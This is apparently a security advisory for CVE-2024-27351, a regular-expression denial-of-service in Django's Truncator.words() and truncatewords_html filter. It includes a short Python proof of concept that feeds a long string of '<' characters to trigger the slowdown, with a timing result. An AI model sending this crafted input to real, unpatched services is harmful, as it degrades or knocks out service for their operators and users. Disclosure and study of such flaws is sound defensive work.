TL;DR

CVE-2024-27351: Potential regular expression denial-of-service in django.utils.text.Truncator.words()

Details:

django.utils.text.Truncator.words() method (with html=True) and truncatewords_html template filter were subject to a potential regular expression denial-of-service attack using a suitably crafted string (follow up to CVE-2019-14232 and CVE-2023-43665).

• The Truncator class truncates text based on word count.
• When the html flag is set, the internal _truncate_html() method is used.
• This method relies on regular expressions stored in variables (re_chars and re_words) to perform the truncation.
• These regular expressions are vulnerable to ReDoS attacks, which can cause significant performance degradation and denial-of-service.

PoC:

#!/usr/bin/env python3
from django.utils.text import Truncator
import time


MAX_LENGTH = 65535

payload = '<' * MAX_LENGTH
print('[INFO] %d bytes of payload' % len(payload))

start_time = time.time()
Truncator(payload).words(3, truncate='...', html=True) # BOOM!
end_time = time.time()

print('[INFO] Truncator().words() took %lf seconds' % (end_time - start_time))

The impact of this vulnerability may vary depending on the computing environment. In my tests using an AMD Ryzen 7 3700X with 32GB RAM, I observed a notable delay of approximately 40 seconds.

Impact

An attacker could exploit this vulnerability to:

• Consume excessive server resources, causing performance degradation and potential service outages.
• Delay application response times significantly.